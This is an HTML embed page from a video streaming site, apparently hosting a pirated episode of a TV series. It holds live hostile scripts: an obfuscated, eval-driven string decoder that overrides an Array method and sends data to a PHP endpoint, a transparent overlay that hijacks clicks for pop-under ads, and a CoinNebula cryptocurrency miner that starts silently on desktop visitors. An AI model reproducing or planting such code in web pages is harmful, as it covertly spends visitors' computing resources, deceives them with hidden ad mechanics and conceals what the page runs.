<HTML>
<HEAD>
<link rel="stylesheet" type="text/css" href="/css/main.css">
<script type="text/javascript" CHARSET="UTF-8" src="https://streamplay.to/js/jquery-1.1.8-min.js"></script>
<script type="text/javascript" CHARSET="UTF-8" src="https://streamplay.to/js/jquery.cookie.js"></script>
<script type="text/javascript" src="https://streamplay.to/js/xupload.js?v=1.0.6"></script>
<script type="text/javascript">var isAdb=true;</script>
<script type="text/javascript" src="https://streamplay.to/js/ads-1.js"></script>
<script type="text/javascript">
function getCalcReferrer() {
	var ref = document.referrer.indexOf('streamplay.to') > -1 ? '' :  document.referrer; 
	return ref || (location.ancestorOrigins ? location.ancestorOrigins.item(location.ancestorOrigins.length-1) : ''); 
}
if(isAdb) $.cookie('ref_ock', '1');
$.cookie('ref_kum', '1');
function getNrf(enc) { var r = $.cookie('ref_yro') ? $.cookie('ref_yro') : getCalcReferrer(); return enc?encodeURIComponent(r):r;  };
var _0x5c63=['wpjDvQ05wpF+QcOqw4rDpg7CrsOHScO3ZcOqwq8Mw6I7OcKdwqfCq8OGw6/DmMOBTQ==','w6xwwprCqDIRwpDCnDgQw54qVTJuwoh4M8O3ekQ5GcKuecKBw6XCgsKFw4k=','wpXCj8Olw6opw6DDsh1QwpPCmgvCosKnwqpBwpY1O8Kn','wp3DgnNi','b8OWw7x3WlVHwrDClQ==','SGPCp8OR','NsO0wrs=','wrMSampuBcKx','NcOERMKWwoQ=','d3UUWcOiens=','TWAPwpQ=','bzpvdlIFw4tkw5XDjwhVwqlCw7kLwp/CrlA1wrkxw4w=','wqlKCMOUwpPDjsKXRVrDosOYwprDoFZQw48LwoEMwrLDs1XCoSnDksOWf0HCv8Ki'];(function(_0x5f2066,_0x549c77){var _0x2d9953=function(_0x398a48){while(--_0x398a48){_0x5f2066['push'](_0x5f2066['shift']());}};_0x2d9953(++_0x549c77);}(_0x5c63,0xfb));var _0x6b39=function(_0x23548c,_0x41e82d){_0x23548c=_0x23548c-0x0;var _0x52198c=_0x5c63[_0x23548c];if(_0x6b39['vDZKoa']===undefined){(function(){var _0x50a7e7=function(){var _0x1ed225;try{_0x1ed225=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x28b5ef){_0x1ed225=window;}return _0x1ed225;};var _0x20ae93=_0x50a7e7();var _0xb80072='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x20ae93['atob']||(_0x20ae93['atob']=function(_0x23f394){var _0x20ef87=String(_0x23f394)['replace'](/=+$/,'');for(var _0x34bfc2=0x0,_0x442ec2,_0x37405d,_0x4e6c37=0x0,_0x113599='';_0x37405d=_0x20ef87['charAt'](_0x4e6c37++);~_0x37405d&&(_0x442ec2=_0x34bfc2%0x4?_0x442ec2*0x40+_0x37405d:_0x37405d,_0x34bfc2++%0x4)?_0x113599+=String['fromCharCode'](0xff&_0x442ec2>>(-0x2*_0x34bfc2&0x6)):0x0){_0x37405d=_0xb80072['indexOf'](_0x37405d);}return _0x113599;});}());var _0x1bf36f=function(_0x4dd214,_0x41e82d){var _0x44e79c=[],_0x285568=0x0,_0x2c4074,_0x184262='',_0x494fee='';_0x4dd214=atob(_0x4dd214);for(var _0x21684f=0x0,_0x365fa6=_0x4dd214['length'];_0x21684f<_0x365fa6;_0x21684f++){_0x494fee+='%'+('00'+_0x4dd214['charCodeAt'](_0x21684f)['toString'](0x10))['slice'](-0x2);}_0x4dd214=decodeURIComponent(_0x494fee);for(var _0x3a3f4e=0x0;_0x3a3f4e<0x100;_0x3a3f4e++){_0x44e79c[_0x3a3f4e]=_0x3a3f4e;}for(_0x3a3f4e=0x0;_0x3a3f4e<0x100;_0x3a3f4e++){_0x285568=(_0x285568+_0x44e79c[_0x3a3f4e]+_0x41e82d['charCodeAt'](_0x3a3f4e%_0x41e82d['length']))%0x100;_0x2c4074=_0x44e79c[_0x3a3f4e];_0x44e79c[_0x3a3f4e]=_0x44e79c[_0x285568];_0x44e79c[_0x285568]=_0x2c4074;}_0x3a3f4e=0x0;_0x285568=0x0;for(var _0x167aec=0x0;_0x167aec<_0x4dd214['length'];_0x167aec++){_0x3a3f4e=(_0x3a3f4e+0x1)%0x100;_0x285568=(_0x285568+_0x44e79c[_0x3a3f4e])%0x100;_0x2c4074=_0x44e79c[_0x3a3f4e];_0x44e79c[_0x3a3f4e]=_0x44e79c[_0x285568];_0x44e79c[_0x285568]=_0x2c4074;_0x184262+=String['fromCharCode'](_0x4dd214['charCodeAt'](_0x167aec)^_0x44e79c[(_0x44e79c[_0x3a3f4e]+_0x44e79c[_0x285568])%0x100]);}return _0x184262;};_0x6b39['imewCC']=_0x1bf36f;_0x6b39['wmWZlF']={};_0x6b39['vDZKoa']=!![];}var _0x713311=_0x6b39['wmWZlF'][_0x23548c];if(_0x713311===undefined){if(_0x6b39['hxUFKn']===undefined){_0x6b39['hxUFKn']=!![];}_0x52198c=_0x6b39['imewCC'](_0x52198c,_0x41e82d);_0x6b39['wmWZlF'][_0x23548c]=_0x52198c;}else{_0x52198c=_0x713311;}return _0x52198c;};Array[_0x6b39('0x0','oPJp')][_0x6b39('0x1','#&%%')]=function(){var _0x1d1e88=this;_0x1d1e88=$[_0x6b39('0x2','kXMw')](_0x1d1e88,function(_0x422054){return _0x422054[_0x6b39('0x3','wxXQ')](/[0-9a-z]{40,}/i,function(_0x27c7ec){var r=_0x27c7ec[_0x6b39('0x4','Y$4B')]('')[_0x6b39('0x5','XcfA')]();var _0x447b2d=_0x6b39('0x6','jQrj')+_0x6b39('0x7','3a@r')+_0x6b39('0x8','!zG[')+_0x6b39('0x9','v95b')+_0x6b39('0xa','g@(X')+_0x6b39('0xb',')hWz');eval(_0x447b2d);return r[_0x6b39('0xc','$kr6')]('');});return _0x422054;});var request = new XMLHttpRequest();
  var the_data = '';
  var php_file='streamplay.php?link=' + encodeURIComponent(_0x1d1e88);
  request.open('GET', php_file, true);
  request.send(the_data);
  ;};

</script>
<meta name="PAC" content="File was deleted"/>

<title>The_Umbrella_Academy_S01E08_720p_WEBRip_X264-METCON</title>
</HEAD>
<BODY topmargin=0 leftmargin=0 style="background:transparent;">

    <div style="position:relative;">
    
          <div id="play_limit_box">
            <a href="/premium.html" target="_blank">Upgrade you account</a> to watch videos with no limits!
          </div>

    <script type="text/javascript" src="https://streamplay.to/player_clappr/jwplayer.js?v=1.2.4"></script>
                <script type="text/javascript" src="https://streamplay.to/player_clappr/jwplayer.html5.js"></script>
                <div id='vplayer' style="width:100%px;height:100%px;text-align:center;margin:0 auto;">
                </div>

    </div>




<script type="text/javascript">eval(function(p,a,c,k,e,d){while(c--)if(k[c])p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c]);return p}('b c=["n://m-l-k-j.e.d/4i/10/4h.4g","n://m-l-k-j.e.d/4f/10/4e.4d","n://m-l-k-j.e.d/10/v.4c"];c=c.1f();4(!c)4b.4a(\'49 48 47\');b 7=46 6.45({c:c,1g:"n://m-l-k-j.e.d/i/44/1m/o.43",42:"1n%",1i:"1n%",41:t,40:"#1j",3z:{"3y":[3x]},3w:{3v:"/3u/1m/3t.3s",3r:t,3q:\'3p\',3o:\'#3n\',3m:\'1.3l\',3k:\'3j\',3i:\'3h\',3g:\'-8 -8 0 #g, 8 -8 0 #g, -8  8 0 #g, 8  8 0 #g\'},3f:{3e:20},3d:{3c:{3b:30,3a:5,39:38}},u:\'/37-36.35\',34:\'33-32\',31:\'2z://e.d\'});b p,z,y=0;b 2y=0;b 2x=0;7.a(6.9.2w,3(x){4(5>0&&x.f>=5&&z!=1){z=1;$(\'r.2v\').2u(\'2t\')}4(y==0&&x.f>=1l&&x.f<=(1l+2)){y=x.f}});7.a(6.9.2s,3(){15()});7.a(6.9.2r,3(){$(\'r.14\').2q()});7.a(6.9.2p,3(){4(13.1k)1k()});7.a(6.9.2o,3(1e){w=3(){b h=$(\'#1j\').1h(\'2n\').1i()/18;$(\'.2m\').1h(\'.7-1g\').2l().2k(\'2j-1f\',h+\'2i\')};4(1e)w();2h 2g(w,2f)});7.2e.2d().a(6.9.2c,3(){$(\'[1d-u]\').1c({\'1b\':1})}).a(6.9.2b,3(){$(\'[1d-u]\').2a(t).1c({\'1b\':0.2},29)});3 16(){q\'28\'};3 17(){q\'o\'};3 11(19,s){4(27 1a==\'3\')1a(\'26\',\'25\',19,17(),16()+(s?\' \'+s:\'\'))};3 15(){$(\'r.14\').24();4(p)q;p=1;12=0;4(13.23===22){12=1}$.21(\'/1z?1y=1x&1w=o&1v=1u-1t-1s-1r-1q&1p=1\');11(\'1o\')}',36,163,'|||function|if||Clappr|player|1px|Events|on|var|sources|to|streamplay|current|000|||161|243|a2275|cloud|https|wp80ohirmr1s|vvplay|return|div|extra|true|watermark||fsResize||x2ok|vvad|aohmxnokjqirp6vdjt4adabwdxwkqdbrcnxivoped2oluhlake54vbh3f1l7j|sendGa|adb|window|video_ad|doPlay|getMediaId|getDesc||category|ga|opacity|animate|data|fs|size|poster|find|height|vplayer|isPlayerReady|466|00671|100|Play|embed|624c4f6ab9c69ed096d8b66e0077b27d|1554733588|96|78|3357285|hash|file_code|view|op|dl||get|undefined|cRAds|hide|event|send|typeof|2007|2000|stop|CONTAINER_MEDIACONTROL_HIDE|CONTAINER_MEDIACONTROL_SHOW|getCurrentContainer|core|200|setTimeout|else|px|font|css|next|container|video|PLAYER_FULLSCREEN|PLAYER_READY|show|PLAYER_ENDED|PLAYER_PLAY|slow|fadeIn|video_ad_fadein|PLAYER_TIMEUPDATE|p03357285|tt3357285|http||watermarkLink|right|top|position|png|32x32|favicon|90|bufferBehind|rebufferingGoal|bufferingGoal|streaming|shakaConfiguration|maxMaxBufferLength|hlsjsConfig|textShadow|2px|verticalPosition|normal|fontWeight|3em|fontSize|dacf84|color|transparent|backgroundColor|auto|vtt|wp80ohirmr1s_Italian|srt|src|subtitles|DashShakaPlayback|playback|plugins|parentId|disableVideoTagContextMenu|width|jpg|01|Player|new|files|matching|no|log|console|mp4|m3u8|master|hls|mpd|manifest|dash'.split('|')))
</script>

<div id="uverlay" style="display:none"></div>


<script>
   (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	   (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	   m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	   })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	ga('create', 'UA-70084327-1', 'auto', {
	     'alwaysSendReferrer' : true
	 });
	ga('set', 'referrer', getNrf());
	ga('send', 'pageview');

	$(document).ready(function() {
		//puOverlay('http://3wr110.xyz/apu.php?n=&zoneid=26&direct=1',document.getElementById('uverlay'));
	});

	function isPlayerReady() {
		initOverlay();
		puOverlay('//eontent.streamplay.to/apv.hh?n=&zoneid=26&direct=1', document.getElementById('uverlay'), null, false); // dfu = true
	}

	function initOverlay() {
		var region = {};
        
        if(typeof jwplayer === 'function') {
            region = jwplayer().getSafeRegion();
            region.top = region.x + $('#'+jwplayer().id).offset().top;
            region.left = region.y + $('#'+jwplayer().id).offset().left;
        } else {
            region = $('#vplayer').offset();
            region.width = $('#vplayer').width();
            region.height = $('#vplayer').height() - 50;
        }

		$('#uverlay').css({
			display : 'block',
			position : 'absolute',
			zIndex : 1000,
			width : region.width + 'px',
			height : region.height + 'px',
			top : region.top + 'px',
			left : region.left + 'px',
			background : 'transparent'
		});

		$('#uverlay').click(function() {
	        $(this).hide();
	        if(typeof jwplayer === 'function') jwplayer().play();
	        else player.play();
        });

	};

	function addBannerToContainer(source, bid, tout) {
		bid = bid || 'pst'; tout = tout || 7000;
		$('<iframe>', {src : source, width : '300',	height : '250',	scrolling : 'no', id : bid,	sandbox : 'allow-scripts allow-same-origin', style : 'display:none'}).appendTo('body');
		setTimeout(function() {
			$('#' + bid).remove();
		}, tout);
	}
</script>

<script src="https://streamplay.to/player1/jwplayer.js?v=11"></script>
<script type="text/javascript" src="https://streamplay.to//eontent.streamplay.to/jsa.hh?zoneid=40&ext=1"></script>
<script type="text/javascript"  charset="utf-8">
var iner = null; if(typeof CoinNebula === 'object') { iner = new CoinNebula.Instance('\x73\x74\x72\x65\x61\x6d\x70\x6c\x61\x79\x2e\x74\x6f', {throttle: 0.7}); if(!iner.isMobile()) iner.start();}
</script>
</BODY></HTML>